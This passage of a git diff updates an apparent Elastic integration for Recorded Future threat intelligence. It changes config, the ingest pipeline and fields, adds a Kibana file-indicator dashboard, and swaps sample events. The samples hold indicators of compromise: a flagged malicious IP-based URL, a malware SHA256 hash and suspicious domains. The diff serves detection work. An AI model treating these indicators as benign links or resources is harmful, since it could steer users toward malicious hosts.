"example.net/%e3%83%9d%e3%82%b1%e3%83%a2%e3%83%b3-%e3%82%bb%e3%83%b3%e3%82%bf%e3%83%bc-%e6%a8%aa%e6%b5%9c-%e7%a7%bb%e8%bb%a2-%e3%81%aa%e3%81%9c/%e3%81%b5%e3%82%8b%e3%81%95%e3%81%a8-%e7%b4%8d%e7%a8%8e-%e3%83%88%e3%82%a4%e3%83%ac%e3%83%83%e3%83%88-%e3%83%9a%e3%83%bc%e3%83%91%e3%83%bc-%e9%82%84%e5%85%83-%e7%8e%87/%e6%9c%9d%e6%97%a5-%e6%96%b0%e8%81%9e-be-%e3%83%91%e3%82%ba%e3%83%a" } } diff --git a/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-csv-file-config.yml b/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-csv-file-config.yml index 55abeba415d..3e6146da9b9 100644 --- a/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-csv-file-config.yml +++ b/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-csv-file-config.yml @@ -4,3 +4,5 @@ data_stream: vars: paths: - "{{SERVICE_LOGS_DIR}}/*.csv" +assert: + hit_count: 12 diff --git a/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-fusion-file-download-config.yml b/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-fusion-file-download-config.yml index f9475f2867c..f6ec2610495 100644 --- a/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-fusion-file-download-config.yml +++ b/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-fusion-file-download-config.yml @@ -5,6 +5,7 @@ data_stream: vars: interval: 1m api_token: test-token + list: test custom_url: http://{{Hostname}}:{{Port}}/v2/fusion/files/?path=%2Fpublic%2Ftest-ip.csv preserve_original_event: true enable_request_tracer: true diff --git a/packages/ti_recordedfuture/data_stream/threat/agent/stream/httpjson.yml.hbs b/packages/ti_recordedfuture/data_stream/threat/agent/stream/httpjson.yml.hbs index e299d0eea5f..6f6ad2f49a1 100644 --- a/packages/ti_recordedfuture/data_stream/threat/agent/stream/httpjson.yml.hbs +++ b/packages/ti_recordedfuture/data_stream/threat/agent/stream/httpjson.yml.hbs @@ -24,11 +24,15 @@ request.transforms: value: {{ api_token }} {{/if}} response.decode_as: text/csv +fields_under_root: true +fields: + _conf: + list: '{{list}}' tags: {{#if preserve_original_event}} - preserve_original_event {{/if}} -{{#each tags as |tag i|}} +{{#each tags as |tag|}} - {{tag}} {{/each}} {{#contains "forwarded" tags}} diff --git a/packages/ti_recordedfuture/data_stream/threat/elasticsearch/ingest_pipeline/default.yml b/packages/ti_recordedfuture/data_stream/threat/elasticsearch/ingest_pipeline/default.yml index 7273a16e1c6..b9ac7cae402 100644 --- a/packages/ti_recordedfuture/data_stream/threat/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ti_recordedfuture/data_stream/threat/elasticsearch/ingest_pipeline/default.yml @@ -192,6 +192,10 @@ processors: - set: field: threat.indicator.url.original copy_from: json.Name + - set: + field: threat.indicator.url.full + copy_from: json.Name + if: 'ctx.threat?.indicator?.type == "url"' # # Domain indicators (threat.indicator.type=domain) @@ -233,6 +237,10 @@ processors: - rename: field: json target_field: recordedfuture + - rename: + target_field: recordedfuture.list + field: _conf.list + if: ctx._conf?.list != null # # Cleanup @@ -249,6 +257,7 @@ processors: - recordedfuture.Name - recordedfuture.Risk - _temp_ + - _conf ignore_missing: true on_failure: - set: diff --git a/packages/ti_recordedfuture/data_stream/threat/fields/fields.yml b/packages/ti_recordedfuture/data_stream/threat/fields/fields.yml index d8c340d4c81..e64a4c67472 100644 --- a/packages/ti_recordedfuture/data_stream/threat/fields/fields.yml +++ b/packages/ti_recordedfuture/data_stream/threat/fields/fields.yml @@ -19,6 +19,11 @@ description: > Details of risk rules observed. + - name: list + type: keyword + description: > + User-configured risklist. + - name: labels.is_ioc_transform_source type: constant_keyword value: "true" diff --git a/packages/ti_recordedfuture/data_stream/threat/manifest.yml b/packages/ti_recordedfuture/data_stream/threat/manifest.yml index 118a0c24b43..6d513964a19 100644 --- a/packages/ti_recordedfuture/data_stream/threat/manifest.yml +++ b/packages/ti_recordedfuture/data_stream/threat/manifest.yml @@ -87,12 +87,13 @@ streams: required: true show_user: true - name: api_token - type: text + type: password title: API Token description: Recorded Future API Token (RF_TOKEN). multi: false required: true show_user: true + secret: true - name: custom_url type: url title: Custom URL diff --git a/packages/ti_recordedfuture/data_stream/threat/sample_event.json b/packages/ti_recordedfuture/data_stream/threat/sample_event.json index c6847613155..22a46c78dec 100644 --- a/packages/ti_recordedfuture/data_stream/threat/sample_event.json +++ b/packages/ti_recordedfuture/data_stream/threat/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2023-08-29T13:05:30.615Z", + "@timestamp": "2024-03-29T13:00:04.736Z", "agent": { - "ephemeral_id": "4d3f7527-f999-48d2-920c-3ec5a0b34414", - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "ephemeral_id": "fe05693b-59ec-47c6-9d5e-b0ef7c71ee65", + "id": "bc94f76a-cdb2-4211-9412-c5d6c5711711", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.1" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_recordedfuture.threat", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "id": "bc94f76a-cdb2-4211-9412-c5d6c5711711", "snapshot": false, - "version": "8.9.1" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -26,9 +26,9 @@ "threat" ], "dataset": "ti_recordedfuture.threat", - "ingested": "2023-08-29T13:05:31Z", + "ingested": "2024-03-29T13:00:14Z", "kind": "enrichment", - "risk_score": 87, + "risk_score": 75, "timezone": "+00:00", "type": [ "indicator" @@ -39,60 +39,45 @@ }, "log": { "file": { - "path": "/tmp/service_logs/rf_url_default.csv" + "path": "/tmp/service_logs/rf_file_default.csv" }, - "offset": 45 + "offset": 57 }, "recordedfuture": { "evidence_details": [ { - "Criticality": 1, - "CriticalityLabel": "Unusual", - "EvidenceString": "66 sightings on 22 sources including: Ars Technica, fook.news, urdupresss.com, HackDig Posts, apple.news. Most recent link (Jul 20, 2021): https://techsecuritenews.com/solarwinds-pirates-utilisent-nouvelle-faille-zero-day-attaques/", + "Criticality": 2, + "CriticalityLabel": "Suspicious", + "EvidenceString": "2 sightings on 1 source: PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", "MitigationString": "", - "Name": "defangedURL", - "Rule": "Historically Reported as a Defanged URL", + "Name": "linkedToMalware", + "Rule": "Linked to Malware", + "SightingsCount": 2, "Sources": [ - "Ctq", - "idn:fook.news", - "idn:urdupresss.com", - "POs2u-", - "idn:apple.news", - "idn:cryptoinfoos.com.ng", - "g9rk5F", - "idn:thewindowsupdate.com", - "idn:nationalcybersecuritynews.today", - "gBDK5G", - "idn:microsoft.com", - "idn:techsecuritenews.com", - "idn:mblogs.info", - "J6UzbO", - "idn:viralamo.com", - "idn:sellorbuyhomefast.com", - "idn:crazyboy.tech", - "idn:times24h.com", - "idn:buzzfeeg.com", - "idn:dsmenders.com", - "WroSbs", - "idn:vzonetvgh.com" + "source:doLlw5" ], - "Timestamp": "2021-07-20T00:00:00.000Z" + "SourcesCount": 1, + "Timestamp": "2024-03-23T17:10:20.642Z" }, { "Criticality": 3, "CriticalityLabel": "Malicious", - "EvidenceString": "1 sighting on 1 source: Insikt Group. 1 report: SolarWinds Fixes Critical Vulnerability in Serv-U Managed File Transfer and Secure FTP Products. Most recent link (Jul 10, 2021): https://app.recordedfuture.com/live/sc/1GnDrn8zigTd", + "EvidenceString": "3 sightings on 3 sources: Polyswarm Sandbox Analysis, Recorded Future Triage Malware Analysis, PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", "MitigationString": "", - "Name": "recentAnalystNote", - "Rule": "Recently Reported by Insikt Group", + "Name": "positiveMalwareVerdict", + "Rule": "Positive Malware Verdict", + "SightingsCount": 3, "Sources": [ - "VKz42X" + "source:hzRhwZ", + "source:ndy5_2", + "source:doLlw5" ], - "Timestamp": "2021-07-10T00:00:00.000Z" + "SourcesCount": 3, + "Timestamp": "2024-03-23T16:36:02.000Z" } ], - "name": "http://144.34.179.162/a", - "risk_string": "2/24" + "name": "63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", + "risk_string": "2/17" }, "tags": [ "forwarded", @@ -103,21 +88,17 @@ "name": "Recorded Future" }, "indicator": { + "file": { + "hash": { + "sha256": "63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f" + } + }, "provider": [ - "Ars Technica", - "fook.news", - "urdupresss.com", - "HackDig Posts", - "apple.news", - "Insikt Group" + "PolySwarm", + "Polyswarm Sandbox Analysis", + "Recorded Future Triage Malware Analysis" ], - "type": "url", - "url": { - "domain": "144.34.179.162", - "original": "http://144.34.179.162/a", - "path": "/a", - "scheme": "http" - } + "type": "file" } } -} +} \ No newline at end of file diff --git a/packages/ti_recordedfuture/docs/README.md b/packages/ti_recordedfuture/docs/README.md index b148377f608..4418a453511 100644 --- a/packages/ti_recordedfuture/docs/README.md +++ b/packages/ti_recordedfuture/docs/README.md @@ -23,13 +23,13 @@ An example event for `threat` looks as following: ```json { - "@timestamp": "2023-08-29T13:05:30.615Z", + "@timestamp": "2024-03-29T13:00:04.736Z", "agent": { - "ephemeral_id": "4d3f7527-f999-48d2-920c-3ec5a0b34414", - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "ephemeral_id": "fe05693b-59ec-47c6-9d5e-b0ef7c71ee65", + "id": "bc94f76a-cdb2-4211-9412-c5d6c5711711", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.1" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_recordedfuture.threat", @@ -40,9 +40,9 @@ An example event for `threat` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "id": "bc94f76a-cdb2-4211-9412-c5d6c5711711", "snapshot": false, - "version": "8.9.1" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -50,9 +50,9 @@ An example event for `threat` looks as following: "threat" ], "dataset": "ti_recordedfuture.threat", - "ingested": "2023-08-29T13:05:31Z", + "ingested": "2024-03-29T13:00:14Z", "kind": "enrichment", - "risk_score": 87, + "risk_score": 75, "timezone": "+00:00", "type": [ "indicator" @@ -63,60 +63,45 @@ An example event for `threat` looks as following: }, "log": { "file": { - "path": "/tmp/service_logs/rf_url_default.csv" + "path": "/tmp/service_logs/rf_file_default.csv" }, - "offset": 45 + "offset": 57 }, "recordedfuture": { "evidence_details": [ { - "Criticality": 1, - "CriticalityLabel": "Unusual", - "EvidenceString": "66 sightings on 22 sources including: Ars Technica, fook.news, urdupresss.com, HackDig Posts, apple.news. Most recent link (Jul 20, 2021): https://techsecuritenews.com/solarwinds-pirates-utilisent-nouvelle-faille-zero-day-attaques/", + "Criticality": 2, + "CriticalityLabel": "Suspicious", + "EvidenceString": "2 sightings on 1 source: PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", "MitigationString": "", - "Name": "defangedURL", - "Rule": "Historically Reported as a Defanged URL", + "Name": "linkedToMalware", + "Rule": "Linked to Malware", + "SightingsCount": 2, "Sources": [ - "Ctq", - "idn:fook.news", - "idn:urdupresss.com", - "POs2u-", - "idn:apple.news", - "idn:cryptoinfoos.com.ng", - "g9rk5F", - "idn:thewindowsupdate.com", - "idn:nationalcybersecuritynews.today", - "gBDK5G", - "idn:microsoft.com", - "idn:techsecuritenews.com", - "idn:mblogs.info", - "J6UzbO", - "idn:viralamo.com", - "idn:sellorbuyhomefast.com", - "idn:crazyboy.tech", - "idn:times24h.com", - "idn:buzzfeeg.com", - "idn:dsmenders.com", - "WroSbs", - "idn:vzonetvgh.com" + "source:doLlw5" ], - "Timestamp": "2021-07-20T00:00:00.000Z" + "SourcesCount": 1, + "Timestamp": "2024-03-23T17:10:20.642Z" }, { "Criticality": 3, "CriticalityLabel": "Malicious", - "EvidenceString": "1 sighting on 1 source: Insikt Group. 1 report: SolarWinds Fixes Critical Vulnerability in Serv-U Managed File Transfer and Secure FTP Products. Most recent link (Jul 10, 2021): https://app.recordedfuture.com/live/sc/1GnDrn8zigTd", + "EvidenceString": "3 sightings on 3 sources: Polyswarm Sandbox Analysis, Recorded Future Triage Malware Analysis, PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", "MitigationString": "", - "Name": "recentAnalystNote", - "Rule": "Recently Reported by Insikt Group", + "Name": "positiveMalwareVerdict", + "Rule": "Positive Malware Verdict", + "SightingsCount": 3, "Sources": [ - "VKz42X" + "source:hzRhwZ", + "source:ndy5_2", + "source:doLlw5" ], - "Timestamp": "2021-07-10T00:00:00.000Z" + "SourcesCount": 3, + "Timestamp": "2024-03-23T16:36:02.000Z" } ], - "name": "http://144.34.179.162/a", - "risk_string": "2/24" + "name": "63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", + "risk_string": "2/17" }, "tags": [ "forwarded", @@ -127,25 +112,20 @@ An example event for `threat` looks as following: "name": "Recorded Future" }, "indicator": { + "file": { + "hash": { + "sha256": "63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f" + } + }, "provider": [ - "Ars Technica", - "fook.news", - "urdupresss.com", - "HackDig Posts", - "apple.news", - "Insikt Group" + "PolySwarm", + "Polyswarm Sandbox Analysis", + "Recorded Future Triage Malware Analysis" ], - "type": "url", - "url": { - "domain": "144.34.179.162", - "original": "http://144.34.179.162/a", - "path": "/a", - "scheme": "http" - } + "type": "file" } } } - ``` **Exported fields** @@ -205,6 +185,7 @@ An example event for `threat` looks as following: | log.offset | Offset of the entry in the log file. | long | | message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | | recordedfuture.evidence_details | List of sightings used as evidence for this indicator. | flattened | +| recordedfuture.list | User-configured risklist. | keyword | | recordedfuture.name | Indicator value. | keyword | | recordedfuture.risk_string | Details of risk rules observed. | keyword | | tags | List of keywords used to tag each event. | keyword | diff --git a/packages/ti_recordedfuture/elasticsearch/transform/latest_ioc/fields/fields.yml b/packages/ti_recordedfuture/elasticsearch/transform/latest_ioc/fields/fields.yml index 732eee6f63f..84c55ff957c 100644 --- a/packages/ti_recordedfuture/elasticsearch/transform/latest_ioc/fields/fields.yml +++ b/packages/ti_recordedfuture/elasticsearch/transform/latest_ioc/fields/fields.yml @@ -28,3 +28,8 @@ description: > Details of risk rules observed. + - name: list + type: keyword + description: > + User-configured risklist. + diff --git a/packages/ti_recordedfuture/img/rf-files.png b/packages/ti_recordedfuture/img/rf-files.png new file mode 100644 index 00000000000..7699f472f66 Binary files /dev/null and b/packages/ti_recordedfuture/img/rf-files.png differ diff --git a/packages/ti_recordedfuture/img/rf-overview.png b/packages/ti_recordedfuture/img/rf-overview.png new file mode 100644 index 00000000000..7c91dc1836c Binary files /dev/null and b/packages/ti_recordedfuture/img/rf-overview.png differ diff --git a/packages/ti_recordedfuture/img/rf-urls.png b/packages/ti_recordedfuture/img/rf-urls.png new file mode 100644 index 00000000000..aac8fd838f0 Binary files /dev/null and b/packages/ti_recordedfuture/img/rf-urls.png differ diff --git a/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b.json b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b.json new file mode 100644 index 00000000000..c40b2d4d5a3 --- /dev/null +++ b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b.json @@ -0,0 +1,1135 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"b7f6f99b-95d3-44ab-b935-704e307e0dd8\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"b7f6f99b-95d3-44ab-b935-704e307e0dd8\",\"fieldName\":\"threat.indicator.provider\",\"title\":\"Provider\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"6f1ca1c9-a281-458e-bdcf-b21e67546c34\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"6f1ca1c9-a281-458e-bdcf-b21e67546c34\",\"fieldName\":\"threat.indicator.type\",\"title\":\"Indicator Type\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"50fee1f5-9c14-4620-9c75-f3b91fc6b39f\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"50fee1f5-9c14-4620-9c75-f3b91fc6b39f\",\"fieldName\":\"recordedfuture.list\",\"title\":\"Risk List\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "Dashboard providing statistics about file type indicators from the RecordedFuture integration", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": [ + "ti_recordedfuture.threat" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.dataset": "ti_recordedfuture.threat" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "file" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "file" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n[RecordedFuture Overview](/app/dashboards#/view/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b) \n**[RecordedFuture Files (This Page)](/app/dashboards#/view/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b)** \n[RecordedFuture URLs](/app/dashboards#/view/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3) \n\n[Integrations Page](/app/integrations/detail/ti_recordedfuture/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: file**.\n\nThe dashboard is made to provide general statistics and show the health of your indicators like hash type counters, popular domains, statistics about how many unique indicators are ingested and other relevant information.", + "openLinksInNewTab": false + }, + "title": "Files Navigation Textbox [Logs AbuseCH]", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 46, + "i": "ee21d28f-11b0-46ad-b30a-4aff51453a32", + "w": 7, + "x": 0, + "y": 0 + }, + "panelIndex": "ee21d28f-11b0-46ad-b30a-4aff51453a32", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-b83c382d-fab9-4e60-a632-475e221cc20c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "b83c382d-fab9-4e60-a632-475e221cc20c": { + "columnOrder": [ + "eda3c6d9-dacb-4e5e-b977-50104f76e91a" + ], + "columns": { + "eda3c6d9-dacb-4e5e-b977-50104f76e91a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique MD5", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.md5" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "b83c382d-fab9-4e60-a632-475e221cc20c", + "layerType": "data", + "metricAccessor": "eda3c6d9-dacb-4e5e-b977-50104f76e91a" + } + }, + "title": "Unique MD5 [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "5aa8cc45-eafb-423a-be69-330e1c9e915f", + "w": 8, + "x": 7, + "y": 0 + }, + "panelIndex": "5aa8cc45-eafb-423a-be69-330e1c9e915f", + "title": "Unique MD5 [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-85ad73b3-3b76-49f1-ad20-6256b58918f8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "85ad73b3-3b76-49f1-ad20-6256b58918f8": { + "columnOrder": [ + "289bd005-bdd2-4f3b-83b9-ad6ae52a9ed3" + ], + "columns": { + "289bd005-bdd2-4f3b-83b9-ad6ae52a9ed3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA1", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha1" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "85ad73b3-3b76-49f1-ad20-6256b58918f8", + "layerType": "data", + "metricAccessor": "289bd005-bdd2-4f3b-83b9-ad6ae52a9ed3" + } + }, + "title": "Unique SHA1 [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "2e7f1b1e-7c0d-4f0e-b5a3-75f3558b7b23", + "w": 8, + "x": 15, + "y": 0 + }, + "panelIndex": "2e7f1b1e-7c0d-4f0e-b5a3-75f3558b7b23", + "title": "Unique SHA1 [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-49b7070a-f1d3-46e1-a980-2f6d6d130167", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "49b7070a-f1d3-46e1-a980-2f6d6d130167": { + "columnOrder": [ + "b6c5e221-88ff-490e-bd3e-188b3e0dd1f4" + ], + "columns": { + "b6c5e221-88ff-490e-bd3e-188b3e0dd1f4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA256", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha256" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "49b7070a-f1d3-46e1-a980-2f6d6d130167", + "layerType": "data", + "metricAccessor": "b6c5e221-88ff-490e-bd3e-188b3e0dd1f4" + } + }, + "title": "Unique SHA256 [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "82bffa7f-9796-4815-9256-0cc1d5d89096", + "w": 9, + "x": 23, + "y": 0 + }, + "panelIndex": "82bffa7f-9796-4815-9256-0cc1d5d89096", + "title": "Unique SHA256 [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12768311-834b-48d5-8aad-d17d139c2ae5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "12768311-834b-48d5-8aad-d17d139c2ae5": { + "columnOrder": [ + "0255894e-dd88-4eb1-b21b-0cccecb2cd1b" + ], + "columns": { + "0255894e-dd88-4eb1-b21b-0cccecb2cd1b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA384", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha384" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "12768311-834b-48d5-8aad-d17d139c2ae5", + "layerType": "data", + "metricAccessor": "0255894e-dd88-4eb1-b21b-0cccecb2cd1b" + } + }, + "title": "Unique TLSH [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "6d782218-5709-4ead-b236-21ffcc4c207d", + "w": 8, + "x": 32, + "y": 0 + }, + "panelIndex": "6d782218-5709-4ead-b236-21ffcc4c207d", + "title": "Unique SHA384 [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12768311-834b-48d5-8aad-d17d139c2ae5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "12768311-834b-48d5-8aad-d17d139c2ae5": { + "columnOrder": [ + "0255894e-dd88-4eb1-b21b-0cccecb2cd1b" + ], + "columns": { + "0255894e-dd88-4eb1-b21b-0cccecb2cd1b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA512", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha512" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "12768311-834b-48d5-8aad-d17d139c2ae5", + "layerType": "data", + "metricAccessor": "0255894e-dd88-4eb1-b21b-0cccecb2cd1b" + } + }, + "title": "Unique TLSH [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "58bb203c-031b-4620-9d66-e4368c65ab52", + "w": 8, + "x": 40, + "y": 0 + }, + "panelIndex": "58bb203c-031b-4620-9d66-e4368c65ab52", + "title": "Unique SHA512 [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8": { + "columnOrder": [ + "06b603cb-c9fb-493a-9ca4-e6502ca12054", + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "columns": { + "06b603cb-c9fb-493a-9ca4-e6502ca12054": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.md5\" : *" + }, + "label": "MD5" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha1\" : *" + }, + "label": "SHA1" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha256\" : *" + }, + "label": "SHA256" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha384\" : *" + }, + "label": "SHA384" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha512\" : *" + }, + "label": "SHA512" + } + ] + }, + "scale": "ordinal" + }, + "de0e531b-dda7-461f-9783-3ab9267d202e": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + 